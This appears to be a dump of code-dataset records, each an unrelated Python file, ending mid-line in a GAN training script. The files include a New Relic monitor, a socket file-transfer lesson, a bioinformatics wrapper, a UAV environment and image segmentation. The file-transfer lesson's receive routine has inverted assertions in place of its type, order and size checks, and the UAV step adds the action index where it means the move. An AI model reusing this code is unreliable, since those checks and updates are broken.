os.environ[\"NEWRELIC_LICENCE_KEY\"] = config_values.get(\"license_key\", \"\")\n if \"NEWRELIC_HOSTNAME\" not in os.environ:\n if \"hostname\" in config_values:\n os.environ[\"NEWRELIC_HOSTNAME\"] = config_values[\"hostname\"]\n else:\n hostname = socket.gethostname()\n os.environ[\"NEWRELIC_HOSTNAME\"] = hostname\n\n\ndef setup_arg_parser():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--log', dest='loglevel', default=\"ERROR\",\n help='Define LogLevel')\n return parser\n\ndef setup_logger(loglevel):\n logger.setLevel(loglevel)\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\n logger.addHandler(console_handler)\n\ndef set_headers():\n headers = {\n 'X-License-Key': os.environ.get(\"NEWRELIC_LICENCE_KEY\", None),\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n return headers\n\ndef set_datas(queue_state):\n process_id = os.getpid()\n lvm_datas = {\n \"agent\": {\n \"host\": os.environ[\"NEWRELIC_HOSTNAME\"],\n \"pid\": process_id,\n \"version\": \"0.0.1\"\n },\n \"components\": [\n {\n \"name\": os.environ[\"NEWRELIC_HOSTNAME\"],\n \"guid\": newrelic_guid,\n \"duration\": 60,\n \"metrics\": {\n \"Component/queue/Todo/[Count]\": int(queue_state['todo']),\n \"Component/queue/Doing/[Count]\": int(queue_state['doing']),\n \"Component/queue/Failed/[Count]\": int(queue_state['failed'])\n }\n }\n ]\n }\n return lvm_datas\n\n\ndef post_response(headers, datas):\n response = requests.post(\n \"https://platform-api.newrelic.com/platform/v1/metrics\",\n json.dumps(datas),\n headers=headers\n )\n\n if response.status_code != 200:\n try:\n json_response = json.loads(response.content)\n logger.error(json_response[\"error\"])\n except:\n logger.critical(response.content)\n else:\n resp = response.json()\n logger.info(json.dumps(datas))\n logger.info(\"\"\"Send datas to Newrelic : %s\"\"\"%resp[\"status\"])\n\n\ndef main():\n parser = setup_arg_parser()\n args = parser.parse_args()\n loglevel = args.loglevel\n setup_logger(getattr(logging, loglevel.upper(), None))\n redis_config = Config(\n host=os.environ.get('COUNTER_REDIS_HOST', ''),\n port=os.environ.get('COUNTER_REDIS_PORT', 6379),\n database=os.environ.get('COUNTER_REDIS_DATABASE', 1),\n prefix=os.environ.get('COUNTER_REDIS_QUEUE_PREFIX', 'counter')\n )\n queue = Queue(redis_config)\n\n while True:\n try:\n queue_state = {\n 'todo': queue.get_todo_count(),\n 'doing': queue.get_doing_count(),\n 'failed': queue.get_failed_count()\n }\n headers = set_headers()\n datas = set_datas(queue_state)\n post_response(headers=headers, datas=datas)\n sleep(60)\n except KeyboardInterrupt:\n exit()\n\n\nif __name__ == \"__main__\":\n exit(main())","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27619291","text":"import random\nimport requests\n\n\ndef ip2long(ip):\n ipnum = 0\n iplist = ip.split('.')\n for i in range(4):\n ipnum = ipnum + int(iplist[i]) * 256 ** (3 - i)\n\n return ipnum\n\n\ndef long2ip(ipnum):\n iplist = []\n\n for i in range(4):\n iplist.append(ipnum % 256)\n ipnum = ipnum // 256\n\n ip = ''\n for i in range(4):\n ip += str(iplist[3 - i])\n if i == 3:\n break\n ip += '.'\n\n return ip\n\n\ndef maskToIpNum(ip):\n ips = ip.split('/')\n count = int(ips[1])\n ipstr = ips[0]\n\n ipnum = ip2long(ipstr)\n mask = 0\n for i in range(count):\n mask = mask | (0x01 << (31 - i))\n\n startip = ipnum & mask\n endip = startip + 2 ** (32 - count)\n print(long2ip(startip))\n print(long2ip(endip))\n\n\"\"\"\n192.168.1.1/24\n192.168.1.1/25\n\"\"\"\n\nif __name__ == '__main__':\n maskToIpNum('192.168.1.1/32')\n\n\n\n\n","sub_path":"OnlyTest.py","file_name":"OnlyTest.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35500565","text":"# ch05_netapi.py\n# Define a class NetAPI to utilize NetworkIO to send/recv data.\nimport socket, struct, sys\n\ndef server(host, port):\n import os\n typename = { int:'int', str:'str', bytes:'bytes', float:'float' } # dict\n listeningSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n listeningSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n listeningSock.bind( (host, port) )\n listeningSock.listen()\n print(\"Listening at\", listeningSock.getsockname())\n\n while True:\n sock, sockname = listeningSock.accept()\n handle = NetAPI(sock)\n while True:\n data = handle.recv_file() # It will receive a dict (P.5-8,5-24)\n if not data:\n break\n print('receive from {}\\n{}'.format(sockname, data))\n save_file(data, os.path.join(NetAPI.savePath, sockname[0]))\n sock.close()\n\n listeningSock.close()\n\ndef save_file(fileInfo, dir):\n import os, shutil\n filename = fileInfo.get(NetAPI.FILE_NAME_TAG)\n filesize = fileInfo.get(NetAPI.FILE_SIZE_TAG)\n content = fileInfo.get(NetAPI.FILE_CONTENT_TAG)\n tempFile = fileInfo.get(NetAPI.FILE_BLOCKS_TAG)\n if not filename or not filesize: return False\n if not content and not tempFile:\n return False\n else:\n fullname = os.path.join(dir, filename)\n dirname = os.path.dirname(fullname)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n if content: # 如果是整個 content 送過來\n if len(content) != filesize:\n raise RuntimeError('size mismatches')\n with open(fullname, 'wb') as fp:\n fp.write(content)\n else: # 以 blocks 傳過來, 已存於暫存檔\n if os.path.getsize(tempFile) != filesize:\n raise RuntimeError('size mismatches')\n shutil.move(tempFile, fullname)\n return True\n\ndef client(host, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect( (host, port) )\n\n handle = NetAPI(sock)\n while True:\n fn = input(\"Input filename to transmit -- \")\n if fn == '': break\n handle.send_file(fn)\n\n sock.close()\n\nclass NetAPI:\n # Constants defined in P.5-4\n FILE_TAG_SIZE = 8\n FILE_END_TAG = b'FILEEND0'\n FILE_NAME_TAG = b'FILENAME'\n FILE_SIZE_TAG = b'FILESIZE'\n FILE_CONTENT_TAG = b'FILEDATA'\n FILE_ABORT_TAG = b'FILEABRT'\n FILE_BLOCKS_TAG = b'FILEBLKS'\n savePath = '/home/solomon/Waste/SavedFiles' # 存檔目錄\n\n def __init__(self, iHandle=None, oHandle=None):\n if not iHandle:\n iHandle = b''\n if not oHandle:\n oHandle = iHandle\n from ch05_networkio import NetworkIO\n self.iHandle = NetworkIO(iHandle)\n self.oHandle = NetworkIO(oHandle)\n self.maxSize = 2147483647 # 最大檔案限制\n self.blockSize = 4 # 區塊大小\n\n def send_tag(self, tag): self.oHandle.write_raw(tag)\n def recv_tag(self): return self.iHandle.read_raw(self.FILE_TAG_SIZE)\n\n def send_data(self, data): self.oHandle.write(data)\n def recv_data(self): return self.iHandle.read()\n\n def send_size(self, n): return self.send_data(n)\n def recv_size(self):\n size = self.recv_data()\n if not isinstance(size, int): # 檢查類別是否為 int\n raise TypeError('Invalid size type %s' % type(size))\n return size\n\n def send_name(self, s): return self.send_data(s)\n def recv_name(self):\n path = self.recv_data()\n if not isinstance(path, str): # 檢查是否為 str\n raise TypeError('Invalid size type %s' % type(path))\n return path\n\n def send_content(self, d): return self.send_data(d)\n def recv_content(self): return self.recv_data()\n\n def send_file(self, path):\n import os\n filename = normalize_name(path)\n filesize = os.path.getsize(path)\n filedata = open(path, 'rb').read()\n try:\n self.send_tag(self.FILE_NAME_TAG)\n self.send_name(filename)\n self.send_tag(self.FILE_SIZE_TAG)\n self.send_size(filesize)\n if filesize > self.blockSize:\n self.send_tag(self.FILE_BLOCKS_TAG)\n self.send_blocks(filename)\n else:\n self.send_tag(self.FILE_CONTENT_TAG)\n self.send_content(filedata)\n self.send_tag(self.FILE_END_TAG)\n return True\n except Exception as e:\n print(str(e))\n self.send_tag(self.FILE_ABORT_TAG)\n return False\n\n def recv_file(self):\n result = {}\n while True:\n tag = self.recv_tag()\n if not tag or tag in [self.FILE_END_TAG, self.FILE_ABORT_TAG]: break\n if tag == self.FILE_BLOCKS_TAG:\n tempFile = self.recv_blocks()\n result[tag] = tempFile\n else:\n data = self.recv_data()\n if not data: break\n # print(tag, data)\n if tag == self.FILE_NAME_TAG:\n namelist = data.split('/')\n if '..' in namelist:\n print('Path:', data)\n raise ValueError('dangerous path')\n result[tag] = data\n return result\n\n def send_blocks(self, fileName):\n fp = open(fileName, 'rb')\n blockID = 0\n totalSize = 0\n print(\"[DEBUG] Sending blocks\")\n while True:\n block = fp.read(self.blockSize)\n if not block: break\n blockID += 1\n self.send_data(blockID)\n print(\"DEBUG] sending block #{}: \".format(blockID), end=' ')\n self.send_data(block)\n print(block)\n totalSize += len(block)\n self.send_data(0)\n return totalSize\n\n def recv_blocks(self):\n import os, time\n totalSize = 0\n lastBlockID = 0\n fileName = os.path.abspath(os.path.join(self.savePath, \\\n 'TEMP%x' % int(time.time())))\n dirname = os.path.dirname(fileName)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n with open(fileName, 'wb') as fp:\n while True:\n blockID = self.recv_data()\n print(\"[DEBUG]\", blockID)\n assert not isinstance(blockID, int)\n # if not isinstance(blockID, int):\n # raise TypeError('invalid type of block id %s' % \\\n # type(blockID))\n if blockID == 0: # End of blocks\n break\n assert lastBlockID + 1 != blockID \n # if lastBlockID + 1 != blockID:\n # raise ValueError('block ID error.' \\\n # 'Last: %d current: %d' % (lastBlockID, blockID))\n lastBlockID = blockID\n block = self.recv_data()\n print(\"[DEBUG]\", block)\n assert not isinstance(block, bytes) \n # if not isinstance(block, bytes):\n # raise TypeError('invalid type of block %s' % \\\n # type(block))\n assert len(block) + totalSize > self.maxSize\n # if len(block) + totalSize > self.maxSize:\n # raise RuntimeError('exceed max file size limit %d' % \\\n # self.maxSize)\n fp.write(block)\n return fileName\n\n # End of class NetAPI\n\ndef split_path(path):\n import os.path\n result = []\n while True:\n head, tail = os.path.split(path)\n if tail:\n result.insert(0, tail)\n path = head\n else:\n head = head.strip('/:\\\\')\n if head: result.insert(0, head)\n break\n return result\n\ndef normalize_name(path):\n aList = split_path(path)\n result = \"/\".join(aList)\n return result\n\ndef main():\n msg = \"Usage: %s {server|client} host port\" % sys.argv[0]\n if len(sys.argv) != 4:\n print(msg)\n else:\n host = sys.argv[2]\n port = int(sys.argv[3])\n if sys.argv[1] == \"server\":\n server(host, port)\n elif sys.argv[1] == \"client\":\n client(host, port)\n else:\n print(msg)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"1082/python-trojan/lesson12/ex2/ch05_netapi.py","file_name":"ch05_netapi.py","file_ext":"py","file_size_in_byte":8467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"148425516","text":"# -*- coding: utf-8 -*-\n# Copyright 2017 by Rob Gilmore and Shaurita Hutchins. All rights reserved.\n# Based on ClustalOmega wrapper copyright 2011 by Andreas Wilm.\n#\n# Wrapper for Guidance2 by Rob Gilmore (2017). http://guidance.tau.ac.il/ver2/\n# Used _ClustalOmega.py as template.\n#\n# This code is part of the Biopython distribution and governed by its\n# license. Please see the LICENSE file that should have been included\n# as part of this package.\n\"\"\"Command line wrapper for GUIDANCE2\n\nIt weights, filters or masks unreliably aligned positions in multiple sequence alignments.\"\"\"\n\nfrom __future__ import print_function\nfrom pathlib import Path\nfrom Bio.Application import _Option, _Argument, AbstractCommandline\nimport os\n\n\nclass Guidance2Commandline(AbstractCommandline):\n \"\"\"uCommand line wrapper for GUIDANCE2.\n http://guidance.tau.ac.il/ver2/\n Example:\n --------\n\n \\>>> from Bio.Align.Applications import Guidance2Commandline\n\n You would typically run the command line with clustalomega_cline() or via\n the Python subprocess module, as described in the Biopython tutorial.\n Citation:\n ---------\n Sela, I., Ashkenazy, H., Katoh, K. and Pupko, T. (2015)\n GUIDANCE2: accurate detection of unreliable alignment regions accounting for the uncertainty of multiple parameters.\n Nucleic Acids Research, 2015 Jul 1; 43 (Web Server issue): W7-W14.; doi: 10.1093/nar/gkq443\n\n Landan, G., and D. Graur. (2008).\n Local reliability measures from sets of co-optimal multiple sequence alignments.\n Pac Symp Biocomput 13:15-24\n \"\"\"\n\n\n def __init__(self, cmd=\"guidance\", align=True, **kwargs):\n # order parameters in the same order as invoking guidance on the cmd line (e.g. 'perl guidance.pl')\n if align is True:\n self.parameters = \\\n [\n # Required Parameters\n _Option(['--seqFile', 'seqFile'],\n \"Input sequence file in FASTA format\",\n filename=True, equate=False, is_required=True,\n checker_function=lambda x: str(Path(x).suffix) in ['.fasta', 'fna', '.ffn', '.faa', '.fra']\n and Path(x).is_file()),\n _Option(['--msaProgram', 'msaProgram'],\n \"Which MSA program to use\",\n equate=False, is_required=True,\n checker_function=lambda x: x in ['MAFFT', 'PRANK', 'CLUSTALW', 'MUSCLE']),\n _Option(['--seqType', 'seqType'],\n \"Type of sequences for alignment (amino acids, nucleotides, or codons)\",\n equate=False, is_required=True,\n checker_function=lambda x: x in ['aa', 'nuc', 'codon']),\n _Option(['--outDir', 'outDir'],\n \"Output directory that will be created \"\n \"automatically and hold all output files [please provid full (and not relative) path]\",\n filename=True, equate=False, is_required=True),\n\n # Optional Parameters\n _Option(['--program', 'program'],\n \"[GUIDANCE2|GUIDANCE|HoT] Default=GUIDANCE2\",\n equate=False,\n checker_function=lambda x: x in [\"GUIDANCE2\", \"GUIDANCE\", \"HoT\"]),\n _Option(['--bootstraps', 'bootstraps'],\n \"Number of bootstrap iterations (only for GUIDQANCE). Defaut=100\",\n equate=False,\n checker_function=lambda x: isinstance(x, int)),\n _Option(['--genCode', 'genCode'],\n \"Genetic code identifier (only for codon sequences). Default=1 \\\n 1) Nuclear Standard\\\n 15) Nuclear Blepharisma\\\n 6) Nuclear Ciliate\\\n 10) Nuclear Euplotid\\\n 2) Mitochondria Vertebrate\\\n 5) Mitochondria Invertebrate\\\n 3) Mitochondria Yeast\\\n 13) Mitochondria Ascidian\\\n 9) Mitochondria Echinoderm\\\n 14) Mitochondria Flatworm\\\n 4) Mitochondria Protozoan\",\n equate=False,\n checker_function=lambda x: isinstance(x, int)),\n _Option(['--outOrder', 'outOrder'],\n \"[aligned|as_input] default=aligned\",\n equate=False,\n checker_function=lambda x: x in ['aligned', 'as_input']),\n _Option(['--msaFile', 'msaFile'],\n \"Input alignment file - not recommended\",\n filename=True, equate=False,\n checker_function=lambda x: Path(x).is_file()),\n # Confidence scores\n _Option(['--seqCutoff', 'seqCutoff'],\n \"Confidence cutoff between 0 to 1. Default=0.6\",\n equate=False,\n checker_function=lambda x: isinstance(x, (int, float))),\n _Option(['--colCutoff', 'colCutoff'],\n \"Confidence cutoff between 0 to 1. Default=0.93\",\n equate=False,\n checker_function=lambda x: isinstance(x, (int, float))),\n # Alignment Programs\n _Option(['--mafft', 'mafft'],\n \"path to mafft executable. Default=mafft\",\n filename=True, equate=False,\n checker_function=lambda x: Path(x).is_file()),\n _Option(['--prank', 'prank'],\n \"path to prank executable. Default=prank\",\n filename=True, equate=False,\n checker_function=lambda x: Path(x).is_file()),\n _Option(['--muscle', 'muscle'],\n \"path to muscle executable. default=muscle\",\n filename=True, equate=False,\n checker_function=lambda x: Path(x).is_file()),\n _Option(['--pagan', 'pagan'],\n \"path to pagan executable, default=pagan\",\n filename=True, equate=False,\n checker_function=lambda x: Path(x).is_file()),\n _Option(['--ruby', 'ruby'],\n \"path to ruby executable. default=ruby\",\n filename=True, equate=False,\n checker_function=lambda x: Path(x).is_file()),\n # Miscellaneous\n _Option(['--dataset', 'dataset'],\n \"Unique name for the Dataset - will be used as prefix to outputs (default=MSA)\",\n equate=False),\n _Option(['--MSA_Param', 'MSA_Param'],\n \"passing parameters for the alignment program e.g -F to prank. \"\n \"To pass parameter containning '-' in it, add \\ before each '-' e.g. \\-F for PRANK\",\n equate=False),\n _Option(['--proc_num', 'proc_num'],\n \"number of processors to use (default=1)\",\n equate=False,\n checker_function=lambda x: isinstance(x, int))\n # Other Guidance scripts\n ]\n\n ACmd = AbstractCommandline.__init__(self, cmd, **kwargs)\n maskDir = ACmd.__getattribute__('outDir')\n\n if 'maskCutoff' in kwargs.keys():\n if 'maskDir' in kwargs.keys():\n maskDir = kwargs['maskDir']\n os.chdir(maskDir)\n cmd = \"maskLowScoreResidues\"\n self.parameters = \\\n [\n _Argument(['maskFile'],\n \"Input alignment file for masking.\",\n filename=True, is_required=True),\n _Argument(['rprScores'],\n \"Residue pair Residue reliability scores.\",\n filename=True, is_required=True),\n _Argument(['output'],\n \"Absolute path of output file.\",\n filename=True, is_required=True),\n _Argument(['maskCutoff'],\n \"Confidence cutoff between 0 to 1.\",\n filename=True, is_required=True),\n _Argument(['seqType'],\n \"Type of sequences for alignment (amino acids or nucleotides)\",\n is_required=True,\n checker_function=lambda x: x in ['aa', 'nuc'])\n ]\n AbstractCommandline.__init__(self, cmd, **kwargs)\n\n\n","sub_path":"OrthoEvol/Orthologs/Align/guidance2.py","file_name":"guidance2.py","file_ext":"py","file_size_in_byte":9288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"492822054","text":"__author__ = 'luispeinado'\n\n\n### Generamos el oversampling de las clases 2 4 5 para entrenar contra la 3 y validar contra la 1\n\n\nimport sys\nsys.path.insert(0, '../lib/')\nsys.path.append( '../lib')\nimport lib.utils as ut\nimport lib.caffe_utils as cut\nimport lib.sampling_util as smpl\n\n\nbase_path= \"/vol/pfc/data/datasets/\"\n\nmeans_path=\"/vol/pfc/data/means/\"\n\n\n\nsequences=[ \"Sequence2\",\"Sequence4\",\"Sequence5\"]\nsequences=[ \"Sequence_2_4_5\"]\n\nfor seq in sequences:\n smpl.generate_oversample_from_file(base_path+seq,base_path+seq+\"_oversampled\")\n lmdb_path= cut.generate_lmbd_dataset(base_path+seq+\"_oversampled\",base_path+seq+\"_oversampled\"+\"_240_320\",\"240\",\"320\")\n cut.generate_imagen_meadn(lmdb_path,means_path+seq+\"_240_320\")\n","sub_path":"bin/generate_oversampling_2_4_5_lmdb.py","file_name":"generate_oversampling_2_4_5_lmdb.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"630602851","text":"import random\nimport numpy as np\nimport sys\nimport os\n\nSTATE_SPACE_SIZE = 27\nMOVES = [-1, 0, 1]\n\nclass Environment:\n\tA = [i for i in range(0, STATE_SPACE_SIZE)]\n\tA_DIFF = [(i, j, k) for i in MOVES for j in MOVES for k in MOVES]\n\n\tdef __init__(self, args, current_path):\n\t\tself.length = args['length']\n\t\tself.width = args['width']\n\t\tself.height = args['height']\n\t\tself.min_height = args['min_height']\n\t\tself.max_height = args['max_height']\n\t\tself.timeslot_num = args['timeslot_num']\n\t\tself.num_IotDevices = args['iot_devices_number']\n\t\tself.state_size = 3 + self.num_IotDevices * 2\n\t\tself.action_size = STATE_SPACE_SIZE\n\t\tself.uav_pos = []\n\t\tself.iot_devices_pos = []\n\t\tself.uav_trajectory = []\n\t\tself.space_grid = []\n\t\tself.positions_idx = []\n\t\tself.a = []\n\t\tself.R = []\n\n\n\tdef set_positions_idx(self):\n\n\t\tspace_grid = [(i, j, k) for i in range(0, self.length) \n\t\t\t\t\t\t\t for j in range(0, self.width)\n\t\t\t\t\t\t\t for k in range(0, self.height)]\n\n\t\tspace_grid = np.array(space_grid)\n\n\t\tspace2D_state_size = self.length * self.width\n\t\tpositions_idx = np.random.choice(space2D_state_size, size=self.num_IotDevices+1, replace=False) * self.height\n\n\t\treturn [space_grid, positions_idx]\n\n\n\tdef reset(self):\n\n\t\t[self.space_grid, positions_idx] = self.set_positions_idx()\n\n\t\tself.uav_pos = self.space_grid[positions_idx[0], :]\n\t\tself.iot_devices_pos = self.space_grid[positions_idx[1:], :]\n\n\t\tself.uav_trajectory.append(self.uav_pos)\n\n\t\tself.a = np.zeros(self.num_IotDevices)\n\n\t\tself.R = np.zeros(self.num_IotDevices)\n\n\t\tinitial_state = np.concatenate((self.uav_pos, self.a, self.R), axis=0)\n\t\t\n\t\treturn initial_state, self.iot_devices_pos\n\n\n\tdef step(self, agent_action, cur_thrpts, min_thrpts, last_avg_min_thrpts, time_step):\n\n\t\treward = 0\n\n\t\t# update the position of agents\n\t\tuav_pos_temp = self.update_positions(self.uav_pos, agent_action)\n\n\t\tdims = np.array([self.length, self.width, self.height])\n\t\tfor i in range(0, 3):\n\t\t\t\t\tif uav_pos_temp[i] < 0:\n\t\t\t\t\t\tuav_pos_temp[i] = 0\n\t\t\t\t\t\treward -= 1\n\t\t\t\t\tif uav_pos_temp[i] >= dims[i] - 1:\n\t\t\t\t\t\tuav_pos_temp[i] = dims[i] - 1\n\t\t\t\t\t\treward -= 1 \n\n\t\tif uav_pos_temp[2] < self.min_height:\n\t\t\treward -= 1\n\t\tif uav_pos_temp[2] > self.max_height:\n\t\t\treward -= 1\n\n\t\tself.uav_trajectory.append(uav_pos_temp)\n\t\tself.uav_pos = uav_pos_temp\n\n\t\tuav_iot_dists = [np.linalg.norm(dev_pos - self.uav_pos, 1) for dev_pos in self.iot_devices_pos]\n\n\t\tdevice_t = np.argmin(uav_iot_dists)\n\t \n\t\tself.a[device_t] += 1\n\n\t\tdevice_t_thrpt = self.cal_thrpt(self.iot_devices_pos[device_t], self.uav_pos)\n\n\t\tself.R[device_t] += device_t_thrpt\n\n\t\tif cur_thrpts[device_t] == 0:\n\t\t\tmin_thrpts[device_t] = device_t_thrpt\n\t\telif cur_thrpts[device_t] <= device_t_thrpt:\n\t\t\tmin_thrpts[device_t] = device_t_thrpt\n\t\t\treward -= 1\n\n\t\tcur_thrpts[device_t] = device_t_thrpt\n\n\t\tnew_state = np.concatenate((self.uav_pos, self.a, self.R), axis=0)\n\t\t\n\t\tif time_step == self.timeslot_num-1:\n\t\t\tif np.min(min_thrpts) == 0.0:\n\t\t\t\treward -= 2\n\n\t\t\tif last_avg_min_thrpts > np.average(min_thrpts):\n\t\t\t\treward -= 1\n\n\t\t\treturn [new_state, reward, cur_thrpts, min_thrpts, self.uav_trajectory]\n\n\t\treturn [new_state, reward, cur_thrpts, min_thrpts, []]\n\n\n\tdef cal_thrpt(self, dev_pos, uav_pos):\n\t\td = np.linalg.norm(dev_pos - uav_pos, 1)\n\t\treturn np.log2(1+1/(d+0.001))\n\n\n\tdef update_positions(self, pos, act):\n\t\tmove = self.A_DIFF[act]\n\t\tfinal_positions = pos + act\n\t\treturn final_positions\n\n\n","sub_path":"environment/uav_env.py","file_name":"uav_env.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488615060","text":"# -*- coding: utf-8 -*-\n\n# Copyright (C) 2018 VTS, FUDAN UNIVERSITY\n# @author Li Wenxi\n# Efficient Graph-Based Image Segmentation[J]. International Journal of Computer Vision, 2004, 59(2):167-181.\n# Felzenszwalb P F, Huttenlocher D P.\n\nimport cv2\nimport sys\nimport numpy as np\n\n\ndef _diff(img, x1, y1, x2, y2):\n r = np.square(img[0][y1, x1] - img[0][y2, x2])\n g = np.square(img[1][y1, x1] - img[1][y2, x2])\n b = np.square(img[2][y1, x1] - img[2][y2, x2])\n return np.sqrt(r + b + g)\n\n\nclass universe():\n def __init__(self, elements):\n self.num = elements;\n self.elts = []\n for i in range(elements):\n rank = 0;\n size = 1;\n p = i;\n self.elts.append((rank, size, p))\n\n # a older func\n def find(self, x):\n y = x\n while (y != self.elts[y][2]):\n y = self.elts[y][2]\n self.elts[x] = (self.elts[x][0], self.elts[x][1], y);\n return y\n\n # a newer func use recursion\n # def find(self, u):\n # if self.elts[u][2] == u:\n # return u\n #\n # self.elts[u] = (self.elts[u][0], self.elts[u][1], self.find(self.elts[u][2]))\n # return self.elts[u][2]\n\n def join(self, x, y):\n if self.elts[x][0] > self.elts[y][0]:\n self.elts[y] = (self.elts[y][0], self.elts[y][1], self.elts[x][2]);\n self.elts[x] = (self.elts[x][0], self.elts[x][1] + self.elts[y][1], self.elts[x][2])\n else:\n self.elts[x] = (self.elts[x][0], self.elts[x][1], self.elts[y][2])\n self.elts[y] = (self.elts[y][0], self.elts[y][1] + self.elts[x][1], self.elts[y][2])\n if self.elts[x][0] == self.elts[y][0]:\n self.elts[y] = (self.elts[y][0] + 1, self.elts[y][1], self.elts[y][2])\n self.num -= 1\n\n def size(self, x):\n return self.elts[x][1]\n\n def num_sets(self):\n return self.num\n\n\ndef _THRESHOLD(size, c):\n return c / size\n\n\n# Segment a graph\n#\n# Returns a disjoint-set forest representing the segmentation.\n#\n# num_vertices: number of vertices in graph.\n# num_edges: number of edges in graph\n# edges: array of edges.\n# c: constant for treshold function.\ndef _segment_graph(num_vertices, num_edges, graph, c):\n # make a disjoint-set forest\n u = universe(num_vertices)\n\n # init thresholds\n threshold = np.zeros(num_vertices, dtype=float)\n for i in range(num_vertices):\n threshold[i] = _THRESHOLD(1, c)\n\n # for each edge, in non-decreasing weight order...\n for i in range(num_edges):\n a = u.find(graph[i][0])\n b = u.find(graph[i][1])\n if a != b:\n if ((graph[i][2] <= threshold[a]) and\n graph[i][2] <= threshold[b]):\n u.join(a, b)\n a = u.find(a)\n threshold[a] = graph[i][2] + _THRESHOLD(u.size(a), c)\n return u\n\n\ndef _random_rgb():\n r = np.random.rand() * 255\n g = np.random.rand() * 255\n b = np.random.rand() * 255\n return (r, g, b)\n\n\n# Segment an image\n#\n# Returns a color image representing the segmentation.\n#\n# im: image to segment.\n# sigma: to smooth the image.\n# c: constant for treshold function.\n# min_size: minimum component size (enforced by post-processing stage).\n# num_ccs: number of connected components in the segmentation.\n\ndef segment_image(im, sigma, c,\n min_size, num_ccs):\n\n height, width, channel = im.shape\n np_im = np.array(im, dtype=float)\n gaussian_img = cv2.GaussianBlur(np_im, (5, 5), sigma)\n b, g, r = cv2.split(gaussian_img)\n smooth_img = (r, g, b)\n\n # print(height, width, channel)\n\n # build graph\n graph = []\n num = 0;\n\n print(\"staring segment image\")\n for y in range(height):\n for x in range(width):\n if x < width - 1:\n a = y * width + x\n b = y * width + (x + 1)\n # w = 1\n w = _diff(smooth_img, x, y, x + 1, y)\n num += 1\n graph.append((a, b, w))\n\n if y < height - 1:\n a = y * width + x\n b = (y + 1) * width + x\n w = _diff(smooth_img, x, y, x, y + 1)\n num += 1\n graph.append((a, b, w))\n\n if x < width - 1 and y < height - 1:\n a = y * width + x\n b = (y + 1) * width + (x + 1)\n w = _diff(smooth_img, x, y, x + 1, y + 1)\n num += 1\n graph.append((a, b, w))\n\n if x < width - 1 and y > 0:\n a = y * width + x\n b = (y - 1) * width + (x + 1)\n w = _diff(smooth_img, x, y, x + 1, y - 1)\n num += 1\n graph.append((a, b, w))\n # print(x, y)\n\n # sort edges by weight\n # graph.sort(key=lambda x: (x[2]))\n graph = sorted(graph, key=lambda x: (x[2]))\n # segment\n\n u = _segment_graph(width * height, num, graph, c)\n\n # post process small components\n for i in range(num):\n a = u.find(graph[i][0])\n b = u.find(graph[i][1])\n if (a != b) and ((u.size(a) < min_size) or u.size(b) < min_size):\n u.join(a, b)\n\n num_ccs.append(u.num_sets())\n\n # colors = []\n # for i in range(width * height):\n # colors.append(random_rgb())\n #\n # print(\"staring random colors\")\n #\n # # print(\"width\", width, \"height\", height)\n #\n # for y in range(height):\n # for x in range(width):\n # comp = u.find(y * width + x)\n # gaussian_img[y][x] = colors[comp]\n # print(im)\n # im = np.array(im, dtype=int)\n # print(im.shape)\n # print(im)\n # cv2.imshow(\"before\", im[:, :, :3])\n # cv2.waitKey(0)\n im = np.append(im, np.zeros(im.shape[:2], dtype=np.uint8)[:, :, np.newaxis], axis=2)\n # print(im)\n # cv2.imshow(\"after\", im)\n # cv2.waitKey(0)\n dictionary = {}\n count = 0\n for y in range(height):\n for x in range(width):\n temp = u.find(y * width + x)\n if dictionary.__contains__(temp) == False:\n dictionary[temp] = count\n count += 1\n im[y, x, 3] = dictionary[temp]\n # np.set_printoptions(threshold='nan')\n # print(dictionary)\n # print(im[:, :, 3])\n # print(count)\n return im","sub_path":"Graph-Algorithm/SelectiveSearch(Python with OpenCV or scikit-image)/selective-search-based-on-my-segmentation/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"360026598","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\n\nweek = [\n 'Monday',\n 'Tuesday',\n 'Wednesday',\n 'Thursday',\n 'Friday',\n 'Saturday',\n 'Sunday'\n]\n\nwhile True:\n m, d = list(map(int, input().split()))\n if m == 0:\n break\n\n d = date(2004, m, d)\n print(week[d.weekday()])\n","sub_path":"vol00/0027.py","file_name":"0027.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"157018555","text":"import os\nimport numpy as np\nimport argparse\nimport time\nimport librosa\n\nfrom preprocess import *\nfrom model import CCGAN\n\n\ndef train(speaker_name_list, num_epochs, train_dir, validation_dir, model_dir, model_name, random_seed, output_dir, tensorboard_log_dir):\n \n print(speaker_name_list)\n \n np.random.seed(random_seed)\n num_speakers = len(speaker_name_list)\n \n num_sentences = 162 # min(number of setences for each speaker)\n num_epochs = num_epochs\n no_decay = num_epochs * num_sentences * (num_speakers ** 2) / 2.0\n id_mappig_loss_zero = 10000 * (num_speakers ** 2) # can be less\n \n mini_batch_size = 1 # must be 1\n generator_learning_rate = 0.0002\n \n generator_learning_rate_decay = generator_learning_rate / 